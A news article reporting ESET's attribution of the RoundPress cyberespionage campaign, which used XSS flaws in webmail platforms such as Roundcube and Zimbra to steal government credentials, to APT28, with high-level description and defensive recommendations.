Russian state-backed hackers used silent, email-based exploits to breach global government inboxes in a stealthy campaign now linked to APT28.
A newly uncovered cyberespionage operation called RoundPress has been attributed to the Russian state-sponsored hacking group APT28, also known as Fancy Bear. According to cybersecurity firm ESET, the campaign began in 2023 and extended through 2024, exploiting vulnerabilities in widely used webmail platforms to infiltrate the inboxes of government agencies and defense organizations across the globe.
Using both zero-day and known cross-site scripting (XSS) flaws, the hackers targeted platforms such as Roundcube, Horde, MDaemon, and Zimbra. Victims included government entities in Greece, Ukraine, Serbia, and Cameroon, along with military and critical infrastructure targets in Europe and South America.
The attack method was deceptively simple: victims received spear-phishing emails referencing current events. Embedded in these emails was malicious JavaScript, which automatically executed once the email was opened, no clicks or downloads required. The script exploited XSS vulnerabilities to steal credentials and sensitive data.
The payload harvested login details by triggering browser autofill functions, then scraped content from the victim’s inbox and settings. Stolen data, including two-factor authentication settings and password histories, was quietly exfiltrated to hardcoded command-and-control (C2) servers. Each variation of the attack script was tailored to the specific webmail software in use.
Vulnerabilities exploited included:
Though there were no confirmed RoundPress incidents in 2025, ESET warns that similar methods remain viable due to the steady discovery of new XSS flaws in common webmail tools.
ESET researchers stated that the campaign could continue with minimal adjustments, noting: “As long as email remains a reliable attack vector and webmail clients contain exploitable flaws, campaigns like RoundPress are likely to persist.”
The group behind the campaign, APT28, is already sanctioned by the U.S. and European governments for past cyberespionage efforts, including interference in democratic elections and NATO-related targeting.
RoundPress shows a growing cybersecurity risk: attacks that require no user interaction beyond opening an email. As organizations rely on browser-based communications, the threat of silent, automated credential theft becomes more severe. Governments and infrastructure providers remain top targets for state-sponsored hackers, particularly in times of geopolitical tension.
The campaign indicates the need for timely patching, zero-trust access models, and the deprecation of legacy webmail platforms vulnerable to XSS attacks.
APT28, also known as Fancy Bear, is a Russian military-linked hacking group known for high-profile cyberespionage campaigns, including election interference and attacks on NATO entities.
Webmail platforms often contain unpatched vulnerabilities and are widely used in government and enterprise settings, making them attractive entry points for attackers seeking sensitive data.
Spear-phishing emails can bypass user suspicion when tailored with current events, and in cases like RoundPress, no interaction beyond opening the email is needed to trigger the exploit.
Cross-site scripting (XSS) flaws let attackers inject malicious scripts into trusted web apps. Hackers use XSS to execute JavaScript inside emails and steal login credentials.
Steps include retiring outdated webmail software, applying patches promptly, using email content filters, and enforcing zero-trust security models across all user endpoints.